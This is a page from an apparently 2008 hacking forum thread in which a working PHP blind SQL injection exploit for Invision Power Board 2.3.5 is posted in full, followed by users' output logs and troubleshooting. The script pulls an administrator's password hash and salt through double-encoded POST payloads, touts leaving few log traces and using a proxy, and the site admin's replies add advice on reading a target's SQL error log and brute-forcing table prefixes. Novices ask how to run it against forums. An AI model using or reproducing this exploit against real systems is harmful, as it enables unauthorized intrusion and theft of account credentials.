Posted: Sun Oct 05, 2008 7:19 am
SnIpEr (Active user, joined Sep 25, 2008, posts 37)

Well here's the problem. I know how to run it now, but I keep getting this error:
Anyone know how to fix this?

Posted: Tue Oct 07, 2008 6:20 pm
mairh (Beginner, joined Oct 07, 2008, posts 1)

Guys, because I am a noob, can you tell me how I can use that exploit?

Re: IPB <= 2.3.5 sql injection hash/salt fetching exploit

Posted: Thu Oct 16, 2008 1:35 am
devildavid (Regular user, joined Oct 16, 2008, posts 6)

waraxe wrote:
Based on DarkFig's excellent advisory. Easy to use, fast and usually does leave minimal log traces.
Feedback is welcome!
[[update]] ==> version 1.1 with Curl autoload!
Code:
<?php
error_reporting(E_ALL);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// IPB <= 2.3.5 sql injection exploit
// Version 1.1
// written by Janek Vind "waraxe"
// Estonia, Tartu
// http://www.waraxe.us/
// 22. september 2008
// based on DarkFig's advisory
// http://acid-root.new.fr/?0:18
//
// FEATURES:
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
//
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
//
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$url = 'http://localhost/ipb.2.3.5/';
$id = 1;// ID of the target user, default value "1" is admin's ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_"
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '127.0.0.1:8118';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipblog.txt';// Log file
//======================================================================
///////////////////////////////////////////////////////////////////////
// Don't mess below this line, unless you know the stuff ;)
///////////////////////////////////////////////////////////////////////
//=====================================================================
///////////////////////////////////////////////////////////////////////
if(!extension_loaded('curl'))
{
    // dl() with the Windows module name; a Unix build would need php_curl.so,
    // and dl() is only available from the CLI on recent PHP versions
    if(!dl('php_curl.dll'))
    {
        die("Curl extension not loaded!\n Fatal exit ...\n");
    }
    else
    {
        echo "Curl loading success\n";
    }
}
//=====================================================================
$cli = php_sapi_name() === 'cli';
//=====================================================================
// Warning, if executed from webserver
//=====================================================================
if(!$cli)
{
    if(!isset($_REQUEST['wtf-is-cli']))
    {
        echo "<html><head><title>Attention!</title></head>\n";
        echo "<body><br /><br /><center>\n";
        echo "<h1>Warning!</h1>\n";
        echo "This exploit is meant to be used as php CLI script!<br />\n";
        echo "More information:<br />\n";
        echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
        echo "Still, you can try to run it from webserver.<br />\n";
        echo "Just press the button below and prepare for long waiting<br />\n";
        echo "And learn to use php CLI next time, please ...<br />\n";
        echo "<form method=\"get\">\n";
        echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
        echo "</form>\n";
        echo "</center></body></html>\n";
        exit;
    }
    else
    {
        // Let's try to maximize our chances without CLI
        @set_time_limit(0);
    }
}
//=====================================================================
xecho("Target: $url\n");
xecho("Sql table prefix: $prefix\n");
xecho("Testing target URL ... \n");
test_target_url();
xecho("Target URL seems to be valid\n");
xecho("Testing target ID ... \n");
test_target_id();
xecho("Target ID seems to be valid\n");
$hash = get_hash();
$salt = get_salt();
add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");
add_line("Salt: $salt");
add_line("------------------------------------------");
xecho("\n------------------------------------------\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\n------------------------------------------\n");
xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
function test_target_url()
{
    global $url;
    // Always-true injection: a vulnerable target answers "found" for a name
    // that cannot exist. %2527 is a double URL-encoded single quote.
    $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
    $buff = trim(make_post($url, $post, '', $url));
    if($buff !== 'found')
    {
        die('Invalid response, target URL not valid? Exiting ...');
    }
}
//////////////////////////////////////////////////////////////////////
function test_target_id()
{
    global $url, $prefix, $id;
    // Pretest: the user must exist and carry a 32 char (md5) hash
    $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
    if(!test_condition($post))
    {
        die('Invalid response, target ID not valid? Exiting ...');
    }
}
///////////////////////////////////////////////////////////////////////
function get_salt()
{
    $len = 5;
    $out = '';
    xecho("Finding salt ...\n");
    for($i = 1; $i < $len + 1; $i ++)
    {
        $ch = get_saltchar($i);
        xecho("Got pos $i --> $ch\n");
        $out .= "$ch";
        xecho("Current salt: $out \n");
    }
    xecho("\nFinal salt: $out\n\n");
    return $out;
}
///////////////////////////////////////////////////////////////////////
function get_saltchar($pos)
{
    global $prefix, $id;
    $char = '';
    // Salt chars are arbitrary printable ASCII: binary search over 32..128
    $min = 32;
    $max = 128;
    $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
    $curr = 0;
    while(1)
    {
        $area = $max - $min;
        if($area < 2 )
        {
            // Interval is down to {min, max}: one equality test decides
            $post = $pattern . "=$max";
            $eq = test_condition($post);
            if($eq)
            {
                $char = chr($max);
            }
            else
            {
                $char = chr($min);
            }
            break;
        }
        $half = intval(floor($area / 2));
        $curr = $min + $half;
        // %253e is a double URL-encoded ">"
        $post = $pattern . '%253e' . $curr;
        $bigger = test_condition($post);
        if($bigger)
        {
            $min = $curr;
        }
        else
        {
            $max = $curr;
        }
        xecho("Current test: $curr-$max-$min\n");
    }
    return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hash()
{
    $len = 32;
    $out = '';
    xecho("Finding hash ...\n");
    for($i = 1; $i < $len + 1; $i ++)
    {
        $ch = get_hashchar($i);
        xecho("Got pos $i --> $ch\n");
        $out .= "$ch";
        xecho("Current hash: $out \n");
    }
    xecho("\nFinal hash: $out\n\n");
    return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($pos)
{
    global $prefix, $id;
    $char = '';
    $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";
    // First let's determine, if it's number or letter
    // (md5 hex: one request picks [a-f] or [0-9], then only a few more are needed)
    $post = $pattern . '%253e57';
    $letter = test_condition($post);
    if($letter)
    {
        $min = 97;
        $max = 102;
        xecho("Char to find is [a-f]\n");
    }
    else
    {
        $min = 48;
        $max = 57;
        xecho("Char to find is [0-9]\n");
    }
    $curr = 0;
    while(1)
    {
        $area = $max - $min;
        if($area < 2 )
        {
            $post = $pattern . "=$max";
            $eq = test_condition($post);
            if($eq)
            {
                $char = chr($max);
            }
            else
            {
                $char = chr($min);
            }
            break;
        }
        $half = intval(floor($area / 2));
        $curr = $min + $half;
        $post = $pattern . '%253e' . $curr;
        $bigger = test_condition($post);
        if($bigger)
        {
            $min = $curr;
        }
        else
        {
            $max = $curr;
        }
        xecho("Current test: $curr-$max-$min\n");
    }
    return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
    global $url;
    $bret = false;
    $maxtry = 10;
    $try = 1;
    // %% is a literal % for sprintf(); the payload is double URL-encoded
    // (%2527 -> %27 -> ', %2522 -> %22 -> ") so the quotes reach the query
    // only after IPB's own decoding. "found" means the injected WHERE held.
    $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
    $post = sprintf($pattern, $p);
    while(1)
    {
        $buff = trim(make_post($url, $post, '', $url));
        if($buff === 'found')
        {
            $bret = true;
            break;
        }
        elseif($buff === 'notfound')
        {
            break;
        }
        elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
        {
            die("Sql error! Wrong prefix?\nExiting ... ");
        }
        else
        {
            xecho("test_condition() - try $try - invalid return value ...\n");
            $try ++;
            if($try > $maxtry)
            {
                die("Too many tries - exiting ...\n");
            }
            else
            {
                xecho("Trying again - try $try ...\n");
            }
        }
    }
    return $bret;
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
    $ch = curl_init();
    $timeout = 120;
    curl_setopt ($ch, CURLOPT_URL, $url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
    if(!empty($GLOBALS['proxy_ip_port']))
    {
        curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
        if(!empty($GLOBALS['proxy_user_password']))
        {
            curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
        }
    }
    if(!empty($cookie))
    {
        curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
    }
    if(!empty($referer))
    {
        curl_setopt ($ch, CURLOPT_REFERER, $referer);
    }
    if($headers === TRUE)
    {
        curl_setopt ($ch, CURLOPT_HEADER, TRUE);
    }
    else
    {
        curl_setopt ($ch, CURLOPT_HEADER, FALSE);
    }
    $fc = curl_exec($ch);
    curl_close($ch);
    return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($line)
{
    global $outfile;
    $line .= "\n";
    $fh = fopen($outfile, 'ab');
    fwrite($fh, $line);
    fclose($fh);
}
///////////////////////////////////////////////////////////////////////
function xecho($line)
{
    if($GLOBALS['cli'])
    {
        echo "$line";
    }
    else
    {
        $line = nl2br(htmlspecialchars($line));
        echo "$line";
    }
}
//////////////////////////////////////////////////////////////////////
?>

Still I don't understand how to use the exploit. Any deeper explanation?

Posted: Sun Oct 19, 2008 9:20 am
CygniX (Beginner, joined Oct 19, 2008, posts 3)

Weird error. I get this every time: what's with this? I have tested the forum, and the IPS error thrown up means that it's vulnerable. But this output = whyyyy?
Code:
Target: http://someforum
Sql table prefix: ibf_
Testing target URL ...
Target URL seems to be valid
Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402
Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403
Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404
Notice: Undefined variable: i in /home/ryu/public_html/ipbsingleuser.php on line 102
Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402
Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403
Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404
------------------------------------------
User ID: 163376
Hash: ffffffffffffffffffffffffffffffff
Salt: €€€€€
------------------------------------------
Warning: fopen(ipblog.txt) [function.fopen]: failed to open stream: Permission denied in /home/ryu/public_html/ipbsingleuser.php on line 402
Warning: fwrite(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 403
Warning: fclose(): supplied argument is not a valid stream resource in /home/ryu/public_html/ipbsingleuser.php on line 404
Questions and feedback - http://www.waraxe.us/
See ya! :)

Posted: Sun Oct 19, 2008 11:15 am
waraxe (Site admin, joined May 11, 2004, posts 2407, location Estonia, Tartu)

Like the error message says, the script does not have write permissions in the current directory. So you can just disable the logging functionality by commenting out some lines in the PHP code.

Posted: Sun Oct 19, 2008 1:48 pm
CygniX (Beginner, joined Oct 19, 2008, posts 3)

How about the wrong hash and salt given?

Posted: Sun Oct 19, 2008 2:05 pm
waraxe (Site admin, joined May 11, 2004, posts 2407, location Estonia, Tartu)

CygniX wrote:
How about the wrong hash and salt given?

Well, my script makes two prechecks, one for the URL and one for the user ID. And if one of them fails, then execution will be stopped. So this seems to be some kind of patch or custom IPB code modification, which makes the exploit pass the pretests and then fail hash fetching.
If you are sure that the target is still vulnerable (you can produce an SQL error?), then you need to manually make blind SQL injection tests and find out possible exploitability. Maybe you need your own custom exploit, or just try to modify the original exploit so it will work.

Posted: Mon Oct 20, 2008 12:46 am
CygniX (Beginner, joined Oct 19, 2008, posts 3)

Oh. OK, thanks!
I'll try that.

Posted: Sun Oct 26, 2008 7:09 pm
mattoni (Active user, joined Oct 26, 2008, posts 34, location United Kingdom)

Does that mean it's already patched?

Posted: Wed Nov 05, 2008 6:59 pm
charlis (Beginner, joined Nov 05, 2008, posts 1)

Code:
Sql table prefix: ibf_
Testing target URL ...
Target URL seems to be valid
Testing ID 1
ID 1 not valid, passing ...
Testing ID 2
ID 2 validated
Finding hash ...
Sql error! Wrong prefix?

It looks like the prefix is working...
Then maybe the site is patched? (Passed admin.) Any way to deal with an already patched site? Or just a wrong prefix? If so, any way to get the prefix?
Thanks.

Posted: Wed Nov 05, 2008 8:32 pm
waraxe (Site admin, joined May 11, 2004, posts 2407, location Estonia, Tartu)

Probably a wrong prefix. You can try to look at the SQL error log:
Code:
http://***/cache/sql_error_log_09_24_08.cgi

Just use the current date in the file name.
And ... some servers are showing cgi files as plain text, but others will give you error 500 or 403 ...
Another option is to either bruteforce the prefix or use information_schema. But it means that you have to add additional functionality to the exploit.
Posted: Tue Nov 11, 2008 2:37 pm
wUK (Beginner, joined Nov 11, 2008, posts 2)

I get the following error when trying this:
Quote:
The application has failed to start because php4tl.dll was not found.

I didn't have php_curl.dll to start with but found it online, so I'm guessing that's not the way.

Posted: Wed Nov 12, 2008 1:54 am
_mranderson_ (Valuable expert, joined Oct 30, 2008, posts 51)

Google curl, download and install it; it's that easy.

Posted: Sat Dec 13, 2008 11:07 am
almostwOw (Beginner, joined Dec 10, 2008, posts 4)

Can you teach me how to use this script or something?
I'm a noob.

Posted: Sat Dec 13, 2008 3:03 pm
gyan007 (Advanced user, joined Oct 17, 2008, posts 106)

almostwOw wrote:
Can you teach me how to use this script or something?
I'm a noob.

Google "executing php script". The exploit is PHP.

www.waraxe.us Forum Index -> Invision Power Board
All times are GMT
Page 4 of 5